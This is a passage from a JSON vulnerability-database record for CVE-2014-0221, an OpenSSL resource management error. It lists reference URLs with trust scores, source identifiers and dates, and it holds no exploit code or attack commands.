"https://blogs.oracle.com/sunsecurity/entry/cve_2014_0221_resource_management" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://www.cerberusftp.com/products/releasenotes.html" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/06/chrome-for-android-update.html" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678123" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678073" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www8.hp.com/us/en/software-solutions/operations-analytics-operations-analysis/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://community.rapid7.com/community/metasploit/blog/2014/06/05/security-advisory-openssl-vulnerabilities-cve-2014-0224-cve-2014-0221-in-metasploit" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685551" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15343.html" }, { "trust": 0.3, "url": "http://www.marshut.com/ixwnpv/stunnel-5-02-released.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04363613" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368523" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678413" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678660" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/33a01-5228bdf5d027e/cert_security_mini-_bulletin_xrx15ao_for_cq8570-cq8870_v1-0.pdf" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100182784" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676226" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682026" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-2232-4/" }, { "trust": 0.3, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.3, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.3, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0221" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0221.html" }, { "trust": 0.2, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.2, "url": "http://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library/ind" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5298" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0198" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2014-0221" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34547" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0221" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2232-4/" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/lid/oo_00030" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-511c3e0b2f6f4f6bbc796fc619" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-bd9a1cf60e344c549c4888db93" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-3395d737d98f42149125b9bb05" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-3a7aa5e233904ebe847a5e1555" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-d775367b0a28449ca05660778b" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-e8076c2a35804685ad65b2b1ba" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-2c54f23c6dbc4d598e86fdef95" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-4480df0f6d544779b0143f5c3b" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150108.txt" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0076" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3505.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3506.html" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3508.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3510.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1053.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0226.html" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=webserver\u0026version=2.1.0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0119" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_web_server/2.1/html/2.1.0_release_notes/index.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4590.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4590" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0119.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1086.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0118.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0231.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/solutions/905793" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0224.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0198.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/904433" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0679.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2010-5298.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-3470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0195.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2232-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.18" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.14" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "BID", "id": "67901" }, { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "127159" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127958" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "127042" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-079" }, { "db": "NVD", "id": "CVE-2014-0221" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "BID", "id": "67901" }, { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "127159" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127958" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "127042" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-079" }, { "db": "NVD", "id": "CVE-2014-0221" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-05T00:00:00", "db": "VULMON", "id": "CVE-2014-0221" }, { "date": "2014-06-05T00:00:00", "db": "BID", "id": "67901" }, { "date": "2014-07-11T21:04:18", "db": "PACKETSTORM", "id": "127421" }, { "date": "2014-06-19T23:12:50", "db": "PACKETSTORM", "id": "127159" }, { "date": "2014-07-06T18:53:39", "db": "PACKETSTORM", "id": "127362" }, { "date": "2014-06-27T18:43:56", "db": "PACKETSTORM", "id": "127266" }, { "date": "2014-07-24T23:48:05", "db": "PACKETSTORM", "id": "127608" }, { "date": "2014-06-06T23:46:36", "db": "PACKETSTORM", "id": "126976" }, { "date": "2015-03-27T20:42:44", "db": "PACKETSTORM", "id": "131044" }, { "date": "2017-01-25T21:54:44", "db": "PACKETSTORM", "id": "140720" }, { "date": "2014-08-14T02:25:06", "db": "PACKETSTORM", "id": "127862" }, { "date": "2014-06-10T17:33:47", "db": "PACKETSTORM", "id": "127016" }, { "date": "2014-08-21T19:34:55", "db": "PACKETSTORM", "id": "127958" }, { "date": "2014-08-26T11:11:00", "db": "PACKETSTORM", "id": "128001" }, { "date": "2014-06-11T00:10:53", "db": "PACKETSTORM", "id": "127042" }, { "date": "2014-06-05T15:14:53", "db": "PACKETSTORM", "id": "126925" }, { "date": "2014-06-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-079" }, { "date": "2014-06-05T21:55:06.207000", "db": "NVD", "id": "CVE-2014-0221" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2014-0221" }, { "date": "2017-05-23T16:25:00", "db": "BID", "id": "67901" }, { "date": "2022-08-30T00:00:00", "db": "CNNVD", "id": "CNNVD-201406-079" }, { "date": "2023-11-07T02:18:12.593000", "db": "NVD", "id": "CVE-2014-0221" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-079" } ], "trust": 1.0 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Resource Management Error Vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201406-079" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201406-079" } ], "trust": 0.6 } }